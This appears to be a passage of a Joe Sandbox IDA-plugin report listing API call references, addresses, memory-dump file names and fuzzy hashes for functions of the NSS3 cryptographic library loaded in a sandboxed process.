                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: calloc$ArenaInitLockPoolValuefree
                                                                                                                                                                                                                                                      • String ID: security
                                                                                                                                                                                                                                                      • API String ID: 3379159031-3315324353
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C501C74
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C501C92
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C501C99
                                                                                                                                                                                                                                                      • DeleteCriticalSection.KERNEL32(?), ref: 6C501CCB
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C501CD2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3805613680-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C513046
                                                                                                                                                                                                                                                        • Part of subcall function 6C4FEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4FEE85
                                                                                                                                                                                                                                                      • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C4E7FFB), ref: 6C51312A
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C513154
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C512E8B
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4FF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C4E9BFF,?,00000000,00000000), ref: 6C4FF134
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(8B3C75C0,?,6C4E7FFA), ref: 6C512EA4
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C51317B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$memcpy$K11_Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2334702667-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6C4DED6B
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000000), ref: 6C4DEDCE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,6C4DB04F), ref: 6C4DEE46
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DEECA
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C4DEEEA
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6C4DEEFB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3768380896-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C4DCD35
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DC6
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C580A27), ref: 6C539DD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C539DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C539DED
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C4DCD54
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471CCC,00000000,00000000,?,?), ref: 6C4C729F
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DCD9B
                                                                                                                                                                                                                                                      • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6C4DCE0B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6C4DCE2C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(00000000), ref: 6C4DCE40
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaMark_Util.NSS3(?,6C4DCD93,?), ref: 6C4DCEEE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C4DCD93,?), ref: 6C4DCEFC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C4DCD93,?), ref: 6C4DCF0B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C4DCD93,?), ref: 6C4DCF1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF47
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF67
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6C4DCD93,?,?,?,?,?,?,?,?,?,?,?,6C4DCD93,?), ref: 6C4DCF78
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3748922049-0
                                                                                                                                                                                                                                                      • Opcode ID: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
                                                                                                                                                                                                                                                      • Instruction ID: 9538587150d1a1a6fdc86a3a27b3554f0732d2339f25fd19e859184d3eae6515
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c7fa0e6edeeb942aa640586f9485bb9bbffcbf048f9759fa5f98a29733bd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1551A1B6A001119BEB10FF69DC50FAA73F5AF48359F260528D84997740EB31F905CBD1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFD076,00000000), ref: 6C4EFFE5
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C4F0004
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(?), ref: 6C4F001B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnterMonitor$ErrorValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3413098822-0
                                                                                                                                                                                                                                                      • Opcode ID: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
                                                                                                                                                                                                                                                      • Instruction ID: 723a01fe9171b1fabd2cba15f002211bcbaccebfb7f3a345d2a2a6c20d1a221a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c90723736ae85db9d6e15b606aa1d86e78158f871be5656287a6206a9221ffe0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD4128B5244680CBE720CB28DD51FAB73A1DBC1349F10053DD46BCAF90E77AA94BC642
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6C4AEF38
                                                                                                                                                                                                                                                        • Part of subcall function 6C499520: PK11_IsLoggedIn.NSS3(00000000,?,6C4C379E,?,00000001,?), ref: 6C499542
                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C4AEF53
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32 ref: 6C4B4C4C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?), ref: 6C4B4C60
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CA1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CBE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4CD2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4B4D3A
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C4AEF9E
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AEFC3
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4AF016
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4AF022
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2459274275-0
                                                                                                                                                                                                                                                      • Opcode ID: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                                                      • Instruction ID: 771c71377bd5c236ad001a0f2338ee9dbe3b3de0b14c86f21d76ec03eb7cfc8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 735339babbfed64299df6b602b2fac162ac90e3c3ac5681aa6bec873395f73b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43417171E01109ABEF01CFE9DC85FEE7BB5EB58358F004029F914A6750E77299168BA1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C484894
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5A18D0,?), ref: 6C4CB095
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848CA
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4848DD
                                                                                                                                                                                                                                                      • SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?), ref: 6C4848FF
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C484912
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C48494A
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$AlgorithmTag_$DecodeErrorItem_Quick$Value
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 759476665-0
                                                                                                                                                                                                                                                      • Opcode ID: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
                                                                                                                                                                                                                                                      • Instruction ID: 8259dedcdb35d900bb7581058a460a90aaa79fe2ff848a0a2988d83cff5989a3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed45cc974ebefbc00a4a77a437ae56a45f900b92df428003e929b401843bd5c5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2341D274A06305ABE710CE69CC90FAB73EC9F8429DF40052CEA5997B81F770E904CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(00000060), ref: 6C49CF80
                                                                                                                                                                                                                                                      • SECITEM_DupItem_Util.NSS3(?), ref: 6C49D002
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,00000000), ref: 6C49D016
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49D025
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C49D043
                                                                                                                                                                                                                                                      • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C49D074
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorUtil$Alloc_ContextDestroyItem_K11_Lock
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3361105336-0
                                                                                                                                                                                                                                                      • Opcode ID: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
                                                                                                                                                                                                                                                      • Instruction ID: cd6f0a339e5e5a64f23b45d2358660fbcc702bb750a4583bba4735693d5b3c0a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 023c6f9769e78dcf1d9a6fbcb5d7c58b7121a8b0c3cbab1f9276d8c604b6e516
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 904161B0A012218FEB10DF29C884F9ABFB4AF4835DF154169DC198BB56D774D885CBE1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E3FF2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E4001
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000074), ref: 6C4E400F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • CERT_CertChainFromCert.NSS3(?,00000004,00000000), ref: 6C4E4054
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: PORT_NewArena_Util.NSS3(00001000), ref: 6C47BC24
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C47BC39
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: PORT_ArenaAlloc_Util.NSS3(00000000), ref: 6C47BC58
                                                                                                                                                                                                                                                        • Part of subcall function 6C47BB90: SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C47BCBE
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E4070
                                                                                                                                                                                                                                                      • NSS_CMSSignedData_Destroy.NSS3(00000000), ref: 6C4E40CD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Arena$Alloc_Value$CertCriticalEnterMark_SectionUnlock$AllocateArena_ChainCopyData_DestroyErrorFromItem_Signed
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3882640887-0
                                                                                                                                                                                                                                                      • Opcode ID: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                      • Instruction ID: 024074b332031b399c2a669e95d2cd2f65bfc5c5deb53bc9044effd651d28dac
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8565db44def4394cf1c4ce5b1bb8f6a2474b8ca5098013b0b962094d5317ff05
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E31E771E0034197EB00DFA49C41FBA3374AF9975DF165238EE099BB42FB61E95882D2
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6C472D1A), ref: 6C482E7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • PR_Now.NSS3 ref: 6C482EDF
                                                                                                                                                                                                                                                      • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6C482EE9
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6C472D1A), ref: 6C482F01
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6C472D1A), ref: 6C482F50
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C482F81
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
